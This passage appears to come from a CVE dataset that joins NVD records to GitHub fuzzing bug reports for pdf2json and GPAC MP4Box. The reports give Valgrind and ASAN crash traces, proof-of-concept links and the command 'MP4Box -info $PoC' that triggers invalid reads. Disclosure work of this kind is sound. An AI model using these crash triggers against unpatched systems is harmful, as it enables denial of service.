0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43051F: CCITTFaxStream::CCITTFaxStream(Stream*, int, int, int, int, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42CE76: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42C6AF: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== ==15436== Invalid read of size 2 ==15436== at 0x431C95: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b100bc is 0 bytes after a block of size 108 alloc'd ==15436== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43051F: CCITTFaxStream::CCITTFaxStream(Stream*, int, int, int, int, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42CE76: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42C6AF: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== ==15436== Invalid read of size 2 ==15436== at 0x431CBF: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b100bc is 0 bytes after a block of size 108 alloc'd ==15436== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43051F: CCITTFaxStream::CCITTFaxStream(Stream*, int, int, int, int, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42CE76: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42C6AF: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Error: Unknown operator '������������������������������������' Error: Unknown operator '?������?�����?�����������0' Error: Unknown operator '�����������������?����?�' ==15436== Invalid write of size 8 ==15436== at 0x41C7A2: GfxState::restore() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x467BEB: Gfx::restoreState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A5AA: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40269A: main (pdf2json.cc:275) ==15436== Address 0xfdccfdb8fdb30035 is not stack'd, malloc'd or (recently) free'd ==15436== ==15436== ==15436== Process terminating with default action of signal 11 (SIGSEGV) ==15436== General Protection Fault ==15436== at 0x41C7A2: GfxState::restore() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x467BEB: Gfx::restoreState() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A5AA: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40269A: main (pdf2json.cc:275) ==15436== ==15436== HEAP SUMMARY: ==15436== in use at exit: 211,954 bytes in 1,760 blocks ==15436== total heap usage: 2,027 allocs, 267 frees, 304,086 bytes allocated ==15436== ==15436== LEAK SUMMARY: ==15436== definitely lost: 760 bytes in 4 blocks ==15436== indirectly lost: 192 bytes in 5 blocks ==15436== possibly lost: 0 bytes in 0 blocks ==15436== still reachable: 211,002 bytes in 1,751 blocks ==15436== suppressed: 0 bytes in 0 blocks ==15436== Rerun with --leak-check=full to see details of leaked memory ==15436== ==15436== For counts of detected and suppressed errors, rerun with: -v ==15436== ERROR SUMMARY: 483 errors from 15 contexts (suppressed: 0 from 0) Segmentation fault ~~~ Thanks, Manh Dung
SEGV on CCITTFaxStream::lookChar
https://api.github.com/repos/flexpaper/pdf2json/issues/36/comments
0
2019-05-29T17:55:30Z
2019-05-29T17:55:30Z
https://github.com/flexpaper/pdf2json/issues/36
449,942,847
36
2,224
CVE-2020-19481
2021-07-21T18:15:08.920
An issue was discovered in GPAC before 0.8.0, as demonstrated by MP4Box. It contains an invalid memory read in gf_m2ts_process_pmt in media_tools/mpegts.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2320eb73afba753b39b7147be91f7be7afc0eeb7" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1265" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1266" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1267" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2320eb73afba753b39b7147be91f7be7afc0eeb7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1265" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1266" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1267" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gpac/gpac/issues/1265
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found a crash on MP4Box (the latest commit 987169b on master) due to an invalid read on function gf_m2ts_process_pmt (mpegts.c:2373). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_re_mpegts.c:2373 Command: MP4Box -info $PoC ASAN says: ~~~ /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1655:25: runtime error: left shift of negative value -77 ~~~ Valgrind says: ~~~ ==22089== Invalid read of size 1 ==22089== at 0xBC1918: gf_m2ts_process_pmt (mpegts.c:2373) ==22089== by 0xBAD409: gf_m2ts_section_complete (mpegts.c:1610) ==22089== by 0xBAE791: gf_m2ts_gather_section.isra.14 (mpegts.c:1740) ==22089== by 0xBB8FFF: gf_m2ts_process_packet (mpegts.c:3446) ==22089== by 0xBB8FFF: gf_m2ts_process_data (mpegts.c:3507) ==22089== by 0xBD3B58: gf_m2ts_probe_file (mpegts.c:4641) ==22089== by 0xB9B594: gf_media_import (media_import.c:10998) ==22089== by 0x49B08B: convert_file_info (fileimport.c:124) ==22089== by 0x4621D5: mp4boxMain (main.c:4804) ==22089== by 0x57BC82F: (below main) (libc-start.c:291) ==22089== Address 0x5d8e773 is 29 bytes before a block of size 80 in arena "client" ~~~ Thanks, Manh Dung
Runtime error: left shift of negative value (mpegts.c:2373)
https://api.github.com/repos/gpac/gpac/issues/1265/comments
1
2019-07-05T23:46:25Z
2019-07-07T15:59:07Z
https://github.com/gpac/gpac/issues/1265
464,797,091
1,265
2,225
CVE-2020-19481
2021-07-21T18:15:08.920
An issue was discovered in GPAC before 0.8.0, as demonstrated by MP4Box. It contains an invalid memory read in gf_m2ts_process_pmt in media_tools/mpegts.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2320eb73afba753b39b7147be91f7be7afc0eeb7" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1265" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1266" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1267" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2320eb73afba753b39b7147be91f7be7afc0eeb7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1265" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1266" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1267" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gpac/gpac/issues/1266
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found a crash on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_re_mpegts.c:2236 Command: MP4Box -info $PoC ASAN says: ~~~ /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3089:23: runtime error: left shift of 128 by 24 places cannot be represented in type 'int' ~~~ Valgrind says: ~~~ ==21951== Invalid read of size 1 ==21951== at 0xBC1380: gf_m2ts_process_pmt (mpegts.c:2236) ==21951== by 0xBAD409: gf_m2ts_section_complete (mpegts.c:1610) ==21951== by 0xBAE791: gf_m2ts_gather_section.isra.14 (mpegts.c:1740) ==21951== by 0xBB8FFF: gf_m2ts_process_packet (mpegts.c:3446) ==21951== by 0xBB8FFF: gf_m2ts_process_data (mpegts.c:3507) ==21951== by 0xBD3B58: gf_m2ts_probe_file (mpegts.c:4641) ==21951== by 0xB9B594: gf_media_import (media_import.c:10998) ==21951== by 0x49B08B: convert_file_info (fileimport.c:124) ==21951== by 0x4621D5: mp4boxMain (main.c:4804) ==21951== by 0x57BC82F: (below main) (libc-start.c:291) ==21951== Address 0x5d8c465 is 0 bytes after a block of size 5 alloc'd ==21951== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==21951== by 0xBAB2FA: gf_m2ts_section_complete (mpegts.c:1550) ==21951== by 0xBAE791: gf_m2ts_gather_section.isra.14 (mpegts.c:1740) ==21951== by 0xBB8FFF: gf_m2ts_process_packet (mpegts.c:3446) ==21951== by 0xBB8FFF: gf_m2ts_process_data (mpegts.c:3507) ==21951== by 0xBD3B58: gf_m2ts_probe_file (mpegts.c:4641) ==21951== by 0xB9B594: gf_media_import (media_import.c:10998) ==21951== by 0x49B08B: convert_file_info (fileimport.c:124) ==21951== by 0x4621D5: mp4boxMain (main.c:4804) ==21951== by 0x57BC82F: (below main) (libc-start.c:291) ~~~ Thanks, Manh Dung
Runtime error: left shift of 128 by 24 places cannot be represented in type 'int' (mpegts.c:2236)
https://api.github.com/repos/gpac/gpac/issues/1266/comments
1
2019-07-05T23:46:50Z
2019-07-07T15:58:17Z
https://github.com/gpac/gpac/issues/1266
464,797,129
1,266
2,226
CVE-2020-19481
2021-07-21T18:15:08.920
An issue was discovered in GPAC before 0.8.0, as demonstrated by MP4Box. It contains an invalid memory read in gf_m2ts_process_pmt in media_tools/mpegts.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2320eb73afba753b39b7147be91f7be7afc0eeb7" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1265" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1266" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1267" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/2320eb73afba753b39b7147be91f7be7afc0eeb7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1265" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1266" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1267" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/gpac/gpac/issues/1267
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found a crash on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_re_mpegts.c:2541 Command: MP4Box -info $PoC ASAN says: ~~~ Multiple different PAT on single TS found, ignoring new PAT declaration (table id 127 - extended table id 0) [MPEG-2 TS] Invalid PMT es descriptor size for PID 0 [MPEG-2 TS] PID 0 reused across programs 4096 and 19527, not completely supported /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2541:9: runtime error: member access within null pointer of type 'GF_M2TS_ES *[8192]' ~~~ Valgrind says: ~~~ ==15789== Invalid read of size 4 ==15789== at 0xBC3CBC: gf_m2ts_process_pmt (mpegts.c:2541) ==15789== by 0xBAD409: gf_m2ts_section_complete (mpegts.c:1610) ==15789== by 0xBAE791: gf_m2ts_gather_section.isra.14 (mpegts.c:1740) ==15789== by 0xBB8FFF: gf_m2ts_process_packet (mpegts.c:3446) ==15789== by 0xBB8FFF: gf_m2ts_process_data (mpegts.c:3507) ==15789== by 0xBD3B58: gf_m2ts_probe_file (mpegts.c:4641) ==15789== by 0xB9B594: gf_media_import (media_import.c:10998) ==15789== by 0x49B08B: convert_file_info (fileimport.c:124) ==15789== by 0x4621D5: mp4boxMain (main.c:4804) ==15789== by 0x57BC82F: (below main) (libc-start.c:291) ==15789== Address 0x10 is not stack'd, malloc'd or (recently) free'd ~~~ Thanks, Manh Dung
Runtime error: member access within null pointer of type 'GF_M2TS_ES *[8192]' (mpegts.c:2541)
https://api.github.com/repos/gpac/gpac/issues/1267/comments
1
2019-07-05T23:55:18Z
2019-07-07T15:58:42Z
https://github.com/gpac/gpac/issues/1267
464,797,889
1,267
2,227
CVE-2020-19488
2021-07-21T18:15:08.957
An issue was discovered in box_code_apple.c:119 in Gpac MP4Box 0.8.0, allows attackers to cause a Denial of Service due to an invalid read on function ilst_item_Read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/6170024568f4dda310e98ef7508477b425c58d09" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1263" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/6170024568f4dda310e98ef7508477b425c58d09" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1263" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1263
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
